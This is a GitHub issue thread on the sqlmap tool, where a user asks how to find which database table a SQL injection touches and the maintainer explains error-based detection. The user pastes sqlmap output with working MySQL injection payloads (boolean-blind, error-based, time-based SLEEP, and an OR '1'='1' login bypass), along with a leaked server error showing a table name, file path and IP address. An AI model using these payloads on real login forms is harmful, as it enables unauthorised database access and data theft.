### ISSUE TITLE
Find effected table

### ISSUE THREAD

**Issue by anasri** [sqlmapproject/sqlmap#1297]
Hi , Stamp

Is it possible find the table that is effect by sql injection ? 
for example login user table

**Comment by stamparm** [comment]
In case of error-based SQLi you can just read it from the error message.

In all other cases I am not aware of (at least obvious) methods how to do it.

**Comment by anasri** [comment]
SQLi is  sqlite?

**Comment by stamparm** [comment]
DBMS is SQLite. SQLi stands for SQL injection.

**Comment by anasri** [comment]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: login_username (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: login_username=1 AND 1=1' RLIKE (SELECT (CASE WHEN (7018=7018) THEN 0x3120414e44203125334431 ELSE 0x28 END)) AND 'JPSk'='JPSk&login_password=1' OR '1'='1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: login_username=1 AND 1=1' AND (SELECT 3843 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (CASE WHEN (3843=3843) THEN 1 ELSE 0 END)),0x71786b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YNfv'='YNfv&login_password=1' OR '1'='1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: login_username=1 AND 1=1' AND (SELECT * FROM (SELECT(SLEEP(5)))WoPc) AND 'XEkH'='XEkH&login_password=1' OR '1'='1
---
I cant see the table effect

**Comment by anasri** [comment]
maybe its INFORMATION_SCHEMA.CHARACTER_SETS ?

**Comment by stamparm** [comment]
Well, error-based SQL injection means that there is an error being generated.

Go to your favorite browser and inject an errornous char(s) (e.g. single quote ') and watch the effect.

Also, you can try with `--parse-errors`

p.s. these are really the basics of SQL injection

**Comment by anasri** [comment]
thank you man

**Comment by anasri** [comment]
I see it but didn't attention carefully 
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND+non_existant_table+=+'1','1'+OR+'1'='1','185.23.129.202')' at line 1

insert into log_user (username,password,ip) values ('1'+AND+non_existant_table+=+'1','1'+OR+'1'='1','185.23.129.202')

Filename: /home/portal/public_html/modules/user/models/usermodel.php

Line Number: 363
